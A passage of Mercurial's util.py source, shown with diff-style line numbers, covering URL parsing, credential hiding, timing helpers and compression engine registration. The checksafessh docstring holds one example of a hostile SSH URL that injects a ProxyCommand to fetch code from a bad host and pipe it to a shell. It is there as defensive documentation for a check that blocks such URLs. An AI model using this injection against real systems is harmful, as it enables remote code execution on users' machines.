2543 2564 else:
2544 2565 prefix_char = prefix
2545 2566 mapping[prefix_char] = prefix_char
2546 2567 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2547 2568 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2548 2569
2549 2570 def getport(port):
2550 2571 """Return the port for a given network service.
2551 2572
2552 2573 If port is an integer, it's returned as is. If it's a string, it's
2553 2574 looked up using socket.getservbyname(). If there's no matching
2554 2575 service, error.Abort is raised.
2555 2576 """
2556 2577 try:
2557 2578 return int(port)
2558 2579 except ValueError:
2559 2580 pass
2560 2581
2561 2582 try:
2562 2583 return socket.getservbyname(pycompat.sysstr(port))
2563 2584 except socket.error:
2564 2585 raise error.Abort(_("no port number associated with service '%s'")
2565 2586 % port)
2566 2587
2567 2588 class url(object):
2568 2589 r"""Reliable URL parser.
2569 2590
2570 2591 This parses URLs and provides attributes for the following
2571 2592 components:
2572 2593
2573 2594 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2574 2595
2575 2596 Missing components are set to None. The only exception is
2576 2597 fragment, which is set to '' if present but empty.
2577 2598
2578 2599 If parsefragment is False, fragment is included in query. If
2579 2600 parsequery is False, query is included in path. If both are
2580 2601 False, both fragment and query are included in path.
2581 2602
2582 2603 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2583 2604
2584 2605 Note that for backward compatibility reasons, bundle URLs do not
2585 2606 take host names. That means 'bundle://../' has a path of '../'.
2586 2607
2587 2608 Examples:
2588 2609
2589 2610 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2590 2611 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2591 2612 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2592 2613 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2593 2614 >>> url(b'file:///home/joe/repo')
2594 2615 <url scheme: 'file', path: '/home/joe/repo'>
2595 2616 >>> url(b'file:///c:/temp/foo/')
2596 2617 <url scheme: 'file', path: 'c:/temp/foo/'>
2597 2618 >>> url(b'bundle:foo')
2598 2619 <url scheme: 'bundle', path: 'foo'>
2599 2620 >>> url(b'bundle://../foo')
2600 2621 <url scheme: 'bundle', path: '../foo'>
2601 2622 >>> url(br'c:\foo\bar')
2602 2623 <url path: 'c:\\foo\\bar'>
2603 2624 >>> url(br'\\blah\blah\blah')
2604 2625 <url path: '\\\\blah\\blah\\blah'>
2605 2626 >>> url(br'\\blah\blah\blah#baz')
2606 2627 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2607 2628 >>> url(br'file:///C:\users\me')
2608 2629 <url scheme: 'file', path: 'C:\\users\\me'>
2609 2630
2610 2631 Authentication credentials:
2611 2632
2612 2633 >>> url(b'ssh://joe:xyz@x/repo')
2613 2634 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2614 2635 >>> url(b'ssh://joe@x/repo')
2615 2636 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2616 2637
2617 2638 Query strings and fragments:
2618 2639
2619 2640 >>> url(b'http://host/a?b#c')
2620 2641 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2621 2642 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2622 2643 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2623 2644
2624 2645 Empty path:
2625 2646
2626 2647 >>> url(b'')
2627 2648 <url path: ''>
2628 2649 >>> url(b'#a')
2629 2650 <url path: '', fragment: 'a'>
2630 2651 >>> url(b'http://host/')
2631 2652 <url scheme: 'http', host: 'host', path: ''>
2632 2653 >>> url(b'http://host/#a')
2633 2654 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2634 2655
2635 2656 Only scheme:
2636 2657
2637 2658 >>> url(b'http:')
2638 2659 <url scheme: 'http'>
2639 2660 """
2640 2661
2641 2662 _safechars = "!~*'()+"
2642 2663 _safepchars = "/!~*'()+:\\"
2643 2664 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2644 2665
2645 2666 def __init__(self, path, parsequery=True, parsefragment=True):
2646 2667 # We slowly chomp away at path until we have only the path left
2647 2668 self.scheme = self.user = self.passwd = self.host = None
2648 2669 self.port = self.path = self.query = self.fragment = None
2649 2670 self._localpath = True
2650 2671 self._hostport = ''
2651 2672 self._origpath = path
2652 2673
2653 2674 if parsefragment and '#' in path:
2654 2675 path, self.fragment = path.split('#', 1)
2655 2676
2656 2677 # special case for Windows drive letters and UNC paths
2657 2678 if hasdriveletter(path) or path.startswith('\\\\'):
2658 2679 self.path = path
2659 2680 return
2660 2681
2661 2682 # For compatibility reasons, we can't handle bundle paths as
2662 2683 # normal URLS
2663 2684 if path.startswith('bundle:'):
2664 2685 self.scheme = 'bundle'
2665 2686 path = path[7:]
2666 2687 if path.startswith('//'):
2667 2688 path = path[2:]
2668 2689 self.path = path
2669 2690 return
2670 2691
2671 2692 if self._matchscheme(path):
2672 2693 parts = path.split(':', 1)
2673 2694 if parts[0]:
2674 2695 self.scheme, path = parts
2675 2696 self._localpath = False
2676 2697
2677 2698 if not path:
2678 2699 path = None
2679 2700 if self._localpath:
2680 2701 self.path = ''
2681 2702 return
2682 2703 else:
2683 2704 if self._localpath:
2684 2705 self.path = path
2685 2706 return
2686 2707
2687 2708 if parsequery and '?' in path:
2688 2709 path, self.query = path.split('?', 1)
2689 2710 if not path:
2690 2711 path = None
2691 2712 if not self.query:
2692 2713 self.query = None
2693 2714
2694 2715 # // is required to specify a host/authority
2695 2716 if path and path.startswith('//'):
2696 2717 parts = path[2:].split('/', 1)
2697 2718 if len(parts) > 1:
2698 2719 self.host, path = parts
2699 2720 else:
2700 2721 self.host = parts[0]
2701 2722 path = None
2702 2723 if not self.host:
2703 2724 self.host = None
2704 2725 # path of file:///d is /d
2705 2726 # path of file:///d:/ is d:/, not /d:/
2706 2727 if path and not hasdriveletter(path):
2707 2728 path = '/' + path
2708 2729
2709 2730 if self.host and '@' in self.host:
2710 2731 self.user, self.host = self.host.rsplit('@', 1)
2711 2732 if ':' in self.user:
2712 2733 self.user, self.passwd = self.user.split(':', 1)
2713 2734 if not self.host:
2714 2735 self.host = None
2715 2736
2716 2737 # Don't split on colons in IPv6 addresses without ports
2717 2738 if (self.host and ':' in self.host and
2718 2739 not (self.host.startswith('[') and self.host.endswith(']'))):
2719 2740 self._hostport = self.host
2720 2741 self.host, self.port = self.host.rsplit(':', 1)
2721 2742 if not self.host:
2722 2743 self.host = None
2723 2744
2724 2745 if (self.host and self.scheme == 'file' and
2725 2746 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2726 2747 raise error.Abort(_('file:// URLs can only refer to localhost'))
2727 2748
2728 2749 self.path = path
2729 2750
2730 2751 # leave the query string escaped
2731 2752 for a in ('user', 'passwd', 'host', 'port',
2732 2753 'path', 'fragment'):
2733 2754 v = getattr(self, a)
2734 2755 if v is not None:
2735 2756 setattr(self, a, urlreq.unquote(v))
2736 2757
2737 2758 @encoding.strmethod
2738 2759 def __repr__(self):
2739 2760 attrs = []
2740 2761 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2741 2762 'query', 'fragment'):
2742 2763 v = getattr(self, a)
2743 2764 if v is not None:
2744 2765 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2745 2766 return '<url %s>' % ', '.join(attrs)
2746 2767
2747 2768 def __bytes__(self):
2748 2769 r"""Join the URL's components back into a URL string.
2749 2770
2750 2771 Examples:
2751 2772
2752 2773 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2753 2774 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2754 2775 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2755 2776 'http://user:pw@host:80/?foo=bar&baz=42'
2756 2777 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2757 2778 'http://user:pw@host:80/?foo=bar%3dbaz'
2758 2779 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2759 2780 'ssh://user:pw@[::1]:2200//home/joe#'
2760 2781 >>> bytes(url(b'http://localhost:80//'))
2761 2782 'http://localhost:80//'
2762 2783 >>> bytes(url(b'http://localhost:80/'))
2763 2784 'http://localhost:80/'
2764 2785 >>> bytes(url(b'http://localhost:80'))
2765 2786 'http://localhost:80/'
2766 2787 >>> bytes(url(b'bundle:foo'))
2767 2788 'bundle:foo'
2768 2789 >>> bytes(url(b'bundle://../foo'))
2769 2790 'bundle:../foo'
2770 2791 >>> bytes(url(b'path'))
2771 2792 'path'
2772 2793 >>> bytes(url(b'file:///tmp/foo/bar'))
2773 2794 'file:///tmp/foo/bar'
2774 2795 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2775 2796 'file:///c:/tmp/foo/bar'
2776 2797 >>> print(url(br'bundle:foo\bar'))
2777 2798 bundle:foo\bar
2778 2799 >>> print(url(br'file:///D:\data\hg'))
2779 2800 file:///D:\data\hg
2780 2801 """
2781 2802 if self._localpath:
2782 2803 s = self.path
2783 2804 if self.scheme == 'bundle':
2784 2805 s = 'bundle:' + s
2785 2806 if self.fragment:
2786 2807 s += '#' + self.fragment
2787 2808 return s
2788 2809
2789 2810 s = self.scheme + ':'
2790 2811 if self.user or self.passwd or self.host:
2791 2812 s += '//'
2792 2813 elif self.scheme and (not self.path or self.path.startswith('/')
2793 2814 or hasdriveletter(self.path)):
2794 2815 s += '//'
2795 2816 if hasdriveletter(self.path):
2796 2817 s += '/'
2797 2818 if self.user:
2798 2819 s += urlreq.quote(self.user, safe=self._safechars)
2799 2820 if self.passwd:
2800 2821 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2801 2822 if self.user or self.passwd:
2802 2823 s += '@'
2803 2824 if self.host:
2804 2825 if not (self.host.startswith('[') and self.host.endswith(']')):
2805 2826 s += urlreq.quote(self.host)
2806 2827 else:
2807 2828 s += self.host
2808 2829 if self.port:
2809 2830 s += ':' + urlreq.quote(self.port)
2810 2831 if self.host:
2811 2832 s += '/'
2812 2833 if self.path:
2813 2834 # TODO: similar to the query string, we should not unescape the
2814 2835 # path when we store it, the path might contain '%2f' = '/',
2815 2836 # which we should *not* escape.
2816 2837 s += urlreq.quote(self.path, safe=self._safepchars)
2817 2838 if self.query:
2818 2839 # we store the query in escaped form.
2819 2840 s += '?' + self.query
2820 2841 if self.fragment is not None:
2821 2842 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2822 2843 return s
2823 2844
2824 2845 __str__ = encoding.strmethod(__bytes__)
2825 2846
2826 2847 def authinfo(self):
2827 2848 user, passwd = self.user, self.passwd
2828 2849 try:
2829 2850 self.user, self.passwd = None, None
2830 2851 s = bytes(self)
2831 2852 finally:
2832 2853 self.user, self.passwd = user, passwd
2833 2854 if not self.user:
2834 2855 return (s, None)
2835 2856 # authinfo[1] is passed to urllib2 password manager, and its
2836 2857 # URIs must not contain credentials. The host is passed in the
2837 2858 # URIs list because Python < 2.4.3 uses only that to search for
2838 2859 # a password.
2839 2860 return (s, (None, (s, self.host),
2840 2861 self.user, self.passwd or ''))
2841 2862
2842 2863 def isabs(self):
2843 2864 if self.scheme and self.scheme != 'file':
2844 2865 return True # remote URL
2845 2866 if hasdriveletter(self.path):
2846 2867 return True # absolute for our purposes - can't be joined()
2847 2868 if self.path.startswith(br'\\'):
2848 2869 return True # Windows UNC path
2849 2870 if self.path.startswith('/'):
2850 2871 return True # POSIX-style
2851 2872 return False
2852 2873
2853 2874 def localpath(self):
2854 2875 if self.scheme == 'file' or self.scheme == 'bundle':
2855 2876 path = self.path or '/'
2856 2877 # For Windows, we need to promote hosts containing drive
2857 2878 # letters to paths with drive letters.
2858 2879 if hasdriveletter(self._hostport):
2859 2880 path = self._hostport + '/' + self.path
2860 2881 elif (self.host is not None and self.path
2861 2882 and not hasdriveletter(path)):
2862 2883 path = '/' + path
2863 2884 return path
2864 2885 return self._origpath
2865 2886
2866 2887 def islocal(self):
2867 2888 '''whether localpath will return something that posixfile can open'''
2868 2889 return (not self.scheme or self.scheme == 'file'
2869 2890 or self.scheme == 'bundle')
2870 2891
2871 2892 def hasscheme(path):
2872 2893 return bool(url(path).scheme)
2873 2894
2874 2895 def hasdriveletter(path):
2875 2896 return path and path[1:2] == ':' and path[0:1].isalpha()
2876 2897
2877 2898 def urllocalpath(path):
2878 2899 return url(path, parsequery=False, parsefragment=False).localpath()
2879 2900
2880 2901 def checksafessh(path):
2881 2902 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2882 2903
2883 2904 This is a sanity check for ssh urls. ssh will parse the first item as
2884 2905 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2885 2906 Let's prevent these potentially exploited urls entirely and warn the
2886 2907 user.
2887 2908
2888 2909 Raises an error.Abort when the url is unsafe.
2889 2910 """
2890 2911 path = urlreq.unquote(path)
2891 2912 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2892 2913 raise error.Abort(_('potentially unsafe url: %r') %
2893 2914 (pycompat.bytestr(path),))
2894 2915
2895 2916 def hidepassword(u):
2896 2917 '''hide user credential in a url string'''
2897 2918 u = url(u)
2898 2919 if u.passwd:
2899 2920 u.passwd = '***'
2900 2921 return bytes(u)
2901 2922
2902 2923 def removeauth(u):
2903 2924 '''remove all authentication information from a url string'''
2904 2925 u = url(u)
2905 2926 u.user = u.passwd = None
2906 2927 return bytes(u)
2907 2928
2908 2929 timecount = unitcountfn(
2909 2930 (1, 1e3, _('%.0f s')),
2910 2931 (100, 1, _('%.1f s')),
2911 2932 (10, 1, _('%.2f s')),
2912 2933 (1, 1, _('%.3f s')),
2913 2934 (100, 0.001, _('%.1f ms')),
2914 2935 (10, 0.001, _('%.2f ms')),
2915 2936 (1, 0.001, _('%.3f ms')),
2916 2937 (100, 0.000001, _('%.1f us')),
2917 2938 (10, 0.000001, _('%.2f us')),
2918 2939 (1, 0.000001, _('%.3f us')),
2919 2940 (100, 0.000000001, _('%.1f ns')),
2920 2941 (10, 0.000000001, _('%.2f ns')),
2921 2942 (1, 0.000000001, _('%.3f ns')),
2922 2943 )
2923 2944
2924 2945 @attr.s
2925 2946 class timedcmstats(object):
2926 2947 """Stats information produced by the timedcm context manager on entering."""
2927 2948
2928 2949 # the starting value of the timer as a float (meaning and resulution is
2929 2950 # platform dependent, see util.timer)
2930 2951 start = attr.ib(default=attr.Factory(lambda: timer()))
2931 2952 # the number of seconds as a floating point value; starts at 0, updated when
2932 2953 # the context is exited.
2933 2954 elapsed = attr.ib(default=0)
2934 2955 # the number of nested timedcm context managers.
2935 2956 level = attr.ib(default=1)
2936 2957
2937 2958 def __bytes__(self):
2938 2959 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2939 2960
2940 2961 __str__ = encoding.strmethod(__bytes__)
2941 2962
2942 2963 @contextlib.contextmanager
2943 2964 def timedcm(whencefmt, *whenceargs):
2944 2965 """A context manager that produces timing information for a given context.
2945 2966
2946 2967 On entering a timedcmstats instance is produced.
2947 2968
2948 2969 This context manager is reentrant.
2949 2970
2950 2971 """
2951 2972 # track nested context managers
2952 2973 timedcm._nested += 1
2953 2974 timing_stats = timedcmstats(level=timedcm._nested)
2954 2975 try:
2955 2976 with tracing.log(whencefmt, *whenceargs):
2956 2977 yield timing_stats
2957 2978 finally:
2958 2979 timing_stats.elapsed = timer() - timing_stats.start
2959 2980 timedcm._nested -= 1
2960 2981
2961 2982 timedcm._nested = 0
2962 2983
2963 2984 def timed(func):
2964 2985 '''Report the execution time of a function call to stderr.
2965 2986
2966 2987 During development, use as a decorator when you need to measure
2967 2988 the cost of a function, e.g. as follows:
2968 2989
2969 2990 @util.timed
2970 2991 def foo(a, b, c):
2971 2992 pass
2972 2993 '''
2973 2994
2974 2995 def wrapper(*args, **kwargs):
2975 2996 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
2976 2997 result = func(*args, **kwargs)
2977 2998 stderr = procutil.stderr
2978 2999 stderr.write('%s%s: %s\n' % (
2979 3000 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
2980 3001 time_stats))
2981 3002 return result
2982 3003 return wrapper
2983 3004
2984 3005 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2985 3006 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2986 3007
2987 3008 def sizetoint(s):
2988 3009 '''Convert a space specifier to a byte count.
2989 3010
2990 3011 >>> sizetoint(b'30')
2991 3012 30
2992 3013 >>> sizetoint(b'2.2kb')
2993 3014 2252
2994 3015 >>> sizetoint(b'6M')
2995 3016 6291456
2996 3017 '''
2997 3018 t = s.strip().lower()
2998 3019 try:
2999 3020 for k, u in _sizeunits:
3000 3021 if t.endswith(k):
3001 3022 return int(float(t[:-len(k)]) * u)
3002 3023 return int(t)
3003 3024 except ValueError:
3004 3025 raise error.ParseError(_("couldn't parse size: %s") % s)
3005 3026
3006 3027 class hooks(object):
3007 3028 '''A collection of hook functions that can be used to extend a
3008 3029 function's behavior. Hooks are called in lexicographic order,
3009 3030 based on the names of their sources.'''
3010 3031
3011 3032 def __init__(self):
3012 3033 self._hooks = []
3013 3034
3014 3035 def add(self, source, hook):
3015 3036 self._hooks.append((source, hook))
3016 3037
3017 3038 def __call__(self, *args):
3018 3039 self._hooks.sort(key=lambda x: x[0])
3019 3040 results = []
3020 3041 for source, hook in self._hooks:
3021 3042 results.append(hook(*args))
3022 3043 return results
3023 3044
3024 3045 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3025 3046 '''Yields lines for a nicely formatted stacktrace.
3026 3047 Skips the 'skip' last entries, then return the last 'depth' entries.
3027 3048 Each file+linenumber is formatted according to fileline.
3028 3049 Each line is formatted according to line.
3029 3050 If line is None, it yields:
3030 3051 length of longest filepath+line number,
3031 3052 filepath+linenumber,
3032 3053 function
3033 3054
3034 3055 Not be used in production code but very convenient while developing.
3035 3056 '''
3036 3057 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3037 3058 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3038 3059 ][-depth:]
3039 3060 if entries:
3040 3061 fnmax = max(len(entry[0]) for entry in entries)
3041 3062 for fnln, func in entries:
3042 3063 if line is None:
3043 3064 yield (fnmax, fnln, func)
3044 3065 else:
3045 3066 yield line % (fnmax, fnln, func)
3046 3067
3047 3068 def debugstacktrace(msg='stacktrace', skip=0,
3048 3069 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3049 3070 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3050 3071 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3051 3072 By default it will flush stdout first.
3052 3073 It can be used everywhere and intentionally does not require an ui object.
3053 3074 Not be used in production code but very convenient while developing.
3054 3075 '''
3055 3076 if otherf:
3056 3077 otherf.flush()
3057 3078 f.write('%s at:\n' % msg.rstrip())
3058 3079 for line in getstackframes(skip + 1, depth=depth):
3059 3080 f.write(line)
3060 3081 f.flush()
3061 3082
3062 3083 class dirs(object):
3063 3084 '''a multiset of directory names from a dirstate or manifest'''
3064 3085
3065 3086 def __init__(self, map, skip=None):
3066 3087 self._dirs = {}
3067 3088 addpath = self.addpath
3068 3089 if safehasattr(map, 'iteritems') and skip is not None:
3069 3090 for f, s in map.iteritems():
3070 3091 if s[0] != skip:
3071 3092 addpath(f)
3072 3093 else:
3073 3094 for f in map:
3074 3095 addpath(f)
3075 3096
3076 3097 def addpath(self, path):
3077 3098 dirs = self._dirs
3078 3099 for base in finddirs(path):
3079 3100 if base in dirs:
3080 3101 dirs[base] += 1
3081 3102 return
3082 3103 dirs[base] = 1
3083 3104
3084 3105 def delpath(self, path):
3085 3106 dirs = self._dirs
3086 3107 for base in finddirs(path):
3087 3108 if dirs[base] > 1:
3088 3109 dirs[base] -= 1
3089 3110 return
3090 3111 del dirs[base]
3091 3112
3092 3113 def __iter__(self):
3093 3114 return iter(self._dirs)
3094 3115
3095 3116 def __contains__(self, d):
3096 3117 return d in self._dirs
3097 3118
3098 3119 if safehasattr(parsers, 'dirs'):
3099 3120 dirs = parsers.dirs
3100 3121
3101 3122 def finddirs(path):
3102 3123 pos = path.rfind('/')
3103 3124 while pos != -1:
3104 3125 yield path[:pos]
3105 3126 pos = path.rfind('/', 0, pos)
3106 3127
3107 3128 # compression code
3108 3129
3109 3130 SERVERROLE = 'server'
3110 3131 CLIENTROLE = 'client'
3111 3132
3112 3133 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3113 3134 (u'name', u'serverpriority',
3114 3135 u'clientpriority'))
3115 3136
3116 3137 class compressormanager(object):
3117 3138 """Holds registrations of various compression engines.
3118 3139
3119 3140 This class essentially abstracts the differences between compression
3120 3141 engines to allow new compression formats to be added easily, possibly from
3121 3142 extensions.
3122 3143
3123 3144 Compressors are registered against the global instance by calling its
3124 3145 ``register()`` method.
3125 3146 """
3126 3147 def __init__(self):
3127 3148 self._engines = {}
3128 3149 # Bundle spec human name to engine name.
3129 3150 self._bundlenames = {}
3130 3151 # Internal bundle identifier to engine name.
3131 3152 self._bundletypes = {}
3132 3153 # Revlog header to engine name.
3133 3154 self._revlogheaders = {}
3134 3155 # Wire proto identifier to engine name.
3135 3156 self._wiretypes = {}
3136 3157
3137 3158 def __getitem__(self, key):
3138 3159 return self._engines[key]
3139 3160
3140 3161 def __contains__(self, key):
3141 3162 return key in self._engines
3142 3163
3143 3164 def __iter__(self):
3144 3165 return iter(self._engines.keys())
3145 3166
3146 3167 def register(self, engine):
3147 3168 """Register a compression engine with the manager.
3148 3169
3149 3170 The argument must be a ``compressionengine`` instance.
3150 3171 """
3151 3172 if not isinstance(engine, compressionengine):
3152 3173 raise ValueError(_('argument must be a compressionengine'))
3153 3174
3154 3175 name = engine.name()
3155 3176
3156 3177 if name in self._engines:
3157 3178 raise error.Abort(_('compression engine %s already registered') %
3158 3179 name)
3159 3180
3160 3181 bundleinfo = engine.bundletype()
3161 3182 if bundleinfo:
3162 3183 bundlename, bundletype = bundleinfo
3163 3184
3164 3185 if bundlename in self._bundlenames:
3165 3186 raise error.Abort(_('bundle name %s already registered') %
3166 3187 bundlename)
3167 3188 if bundletype in self._bundletypes:
3168 3189 raise error.Abort(_('bundle type %s already registered by %s') %
3169 3190 (bundletype, self._bundletypes[bundletype]))
3170 3191
3171 3192 # No external facing name declared.
3172 3193 if bundlename:
3173 3194 self._bundlenames[bundlename] = name
3174 3195
3175 3196 self._bundletypes[bundletype] = name
3176 3197
3177 3198 wiresupport = engine.wireprotosupport()
3178 3199 if wiresupport:
3179 3200 wiretype = wiresupport.name
3180 3201 if wiretype in self._wiretypes:
3181 3202 raise error.Abort(_('wire protocol compression %s already '
3182 3203 'registered by %s') %
3183 3204 (wiretype, self._wiretypes[wiretype]))
3184 3205
3185 3206 self._wiretypes[wiretype] = name
3186 3207
3187 3208 revlogheader = engine.revlogheader()
3188 3209 if revlogheader and revlogheader in self._revlogheaders:
3189 3210 raise error.Abort(_('revlog header %s already registered by %s') %
3190 3211 (revlogheader, self._revlogheaders[revlogheader]))
3191 3212
3192 3213 if revlogheader:
3193 3214 self._revlogheaders[revlogheader] = name
3194 3215
3195 3216 self._engines[name] = engine
3196 3217
3197 3218 @property
3198 3219 def supportedbundlenames(self):
3199 3220 return set(self._bundlenames.keys())
3200 3221
3201 3222 @property
3202 3223 def supportedbundletypes(self):
3203 3224 return set(self._bundletypes.keys())
3204 3225
3205 3226 def forbundlename(self, bundlename):
3206 3227 """Obtain a compression engine registered to a bundle name.
3207 3228
3208 3229 Will raise KeyError if the bundle type isn't registered.
3209 3230
3210 3231 Will abort if the engine is known but not available.
3211 3232 """
3212 3233 engine = self._engines[self._bundlenames[bundlename]]
3213 3234 if not engine.available():
3214 3235 raise error.Abort(_('compression engine %s could not be loaded') %
3215 3236 engine.name())
3216 3237 return engine
3217 3238
3218 3239 def forbundletype(self, bundletype):
3219 3240 """Obtain a compression engine registered to a bundle type.
3220 3241
3221 3242 Will raise KeyError if the bundle type isn't registered.
3222 3243
3223 3244 Will abort if the engine is known but not available.
3224 3245 """
3225 3246 engine = self._engines[self._bundletypes[bundletype]]
3226 3247 if not engine.available():
3227 3248 raise error.Abort(_('compression engine %s could not be loaded') %
3228 3249 engine.name())
3229 3250 return engine
3230 3251
3231 3252 def supportedwireengines(self, role, onlyavailable=True):
3232 3253 """Obtain compression engines that support the wire protocol.
3233 3254
3234 3255 Returns a list of engines in prioritized order, most desired first.
3235 3256
3236 3257 If ``onlyavailable`` is set, filter out engines that can't be
3237 3258 loaded.
3238 3259 """
3239 3260 assert role in (SERVERROLE, CLIENTROLE)
3240 3261
3241 3262 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3242 3263
3243 3264 engines = [self._engines[e] for e in self._wiretypes.values()]
3244 3265 if onlyavailable:
3245 3266 engines = [e for e in engines if e.available()]
3246 3267
3247 3268 def getkey(e):
3248 3269 # Sort first by priority, highest first. In case of tie, sort
3249 3270 # alphabetically. This is arbitrary, but ensures output is
3250 3271 # stable.
3251 3272 w = e.wireprotosupport()
3252 3273 return -1 * getattr(w, attr), w.name
3253 3274
3254 3275 return list(sorted(engines, key=getkey))
3255 3276
3256 3277 def forwiretype(self, wiretype):
3257 3278 engine = self._engines[self._wiretypes[wiretype]]
3258 3279 if not engine.available():
3259 3280 raise error.Abort(_('compression engine %s could not be loaded') %
3260 3281 engine.name())
3261 3282 return engine
3262 3283
3263 3284 def forrevlogheader(self, header):
3264 3285 """Obtain a compression engine registered to a revlog header.
3265 3286
3266 3287 Will raise KeyError if the revlog header value isn't registered.
3267 3288 """
3268 3289 return self._engines[self._revlogheaders[header]]
3269 3290
3270 3291 compengines = compressormanager()
3271 3292
3272 3293 class compressionengine(object):
3273 3294 """Base class for compression engines.
3274 3295
3275 3296 Compression engines must implement the interface defined by this class.
3276 3297 """
3277 3298 def name(self):
3278 3299 """Returns the name of the compression engine.
3279 3300
3280 3301 This is the key the engine is registered under.
3281 3302
3282 3303 This method must be implemented.
3283 3304 """
3284 3305 raise NotImplementedError()
3285 3306
3286 3307 def available(self):
3287 3308 """Whether the compression engine is available.
3288 3309
3289 3310 The intent of this method is to allow optional compression engines
3290 3311 that may not be available in all installations (such as engines relying
3291 3312 on C extensions that may not be present).
3292 3313 """
3293 3314 return True
3294 3315
3295 3316 def bundletype(self):
3296 3317 """Describes bundle identifiers for this engine.
3297 3318
3298 3319 If this compression engine isn't supported for bundles, returns None.
3299 3320
3300 3321 If this engine can be used for bundles, returns a 2-tuple of strings of
3301 3322 the user-facing "bundle spec" compression name and an internal
3302 3323 identifier used to denote the compression format within bundles. To
3303 3324 exclude the name from external usage, set the first element to ``None``.
3304 3325
3305 3326 If bundle compression is supported, the class must also implement
3306 3327 ``compressstream`` and `decompressorreader``.
3307 3328
3308 3329 The docstring of this method is used in the help system to tell users
3309 3330 about this engine.
3310 3331 """
3311 3332 return None
3312 3333
3313 3334 def wireprotosupport(self):
3314 3335 """Declare support for this compression format on the wire protocol.
3315 3336
3316 3337 If this compression engine isn't supported for compressing wire
3317 3338 protocol payloads, returns None.
3318 3339
3319 3340 Otherwise, returns ``compenginewireprotosupport`` with the following
3320 3341 fields:
3321 3342
3322 3343 * String format identifier
3323 3344 * Integer priority for the server
3324 3345 * Integer priority for the client
3325 3346
3326 3347 The integer priorities are used to order the advertisement of format
3327 3348 support by server and client. The highest integer is advertised
3328 3349 first. Integers with non-positive values aren't advertised.
3329 3350
3330 3351 The priority values are somewhat arbitrary and only used for default
3331 3352 ordering. The relative order can be changed via config options.
3332 3353
3333 3354 If wire protocol compression is supported, the class must also implement
3334 3355 ``compressstream`` and ``decompressorreader``.
3335 3356 """
3336 3357 return None
3337 3358
3338 3359 def revlogheader(self):
3339 3360 """Header added to revlog chunks that identifies this engine.
3340 3361
3341 3362 If this engine can be used to compress revlogs, this method should
3342 3363 return the bytes used to identify chunks compressed with this engine.
3343 3364 Else, the method should return ``None`` to indicate it does not
3344 3365 participate in revlog compression.
3345 3366 """
3346 3367 return None
3347 3368
3348 3369 def compressstream(self, it, opts=None):
3349 3370 """Compress an iterator of chunks.
3350 3371
3351 3372 The method receives an iterator (ideally a generator) of chunks of
3352 3373 bytes to be compressed. It returns an iterator (ideally a generator)
3353 3374 of bytes of chunks representing the compressed output.
3354 3375
3355 3376 Optionally accepts an argument defining how to perform compression.
3356 3377 Each engine treats this argument differently.
3357 3378 """
3358 3379 raise NotImplementedError()
3359 3380
3360 3381 def decompressorreader(self, fh):
3361 3382 """Perform decompression on a file object.
3362 3383
3363 3384 Argument is an object with a ``read(size)`` method that returns
3364 3385 compressed data. Return value is an object with a ``read(size)`` that
3365 3386 returns uncompressed data.
3366 3387 """
3367 3388 raise NotImplementedError()
3368 3389
3369 3390 def revlogcompressor(self, opts=None):
3370 3391 """Obtain an object that can be used to compress revlog entries.
3371 3392
3372 3393 The object has a ``compress(data)`` method that compresses binary
3373 3394 data. This method returns compressed binary data or ``None`` if
3374 3395 the data could not be compressed (too small, not compressible, etc).
3375 3396 The returned data should have a header uniquely identifying this
3376 3397 compression format so decompression can be routed to this engine.
3377 3398 This header should be identified by the ``revlogheader()`` return
3378 3399 value.
3379 3400
3380 3401 The object has a ``decompress(data)`` method that decompresses
3381 3402 data. The method will only be called if ``data`` begins with
3382 3403 ``revlogheader()``. The method should return the raw, uncompressed
3383 3404 data or raise a ``RevlogError``.
3384 3405
3385 3406 The object is reusable but is not thread safe.
3386 3407 """
3387 3408 raise NotImplementedError()
3388 3409
3389 3410 class _CompressedStreamReader(object):
3390 3411 def __init__(self, fh):
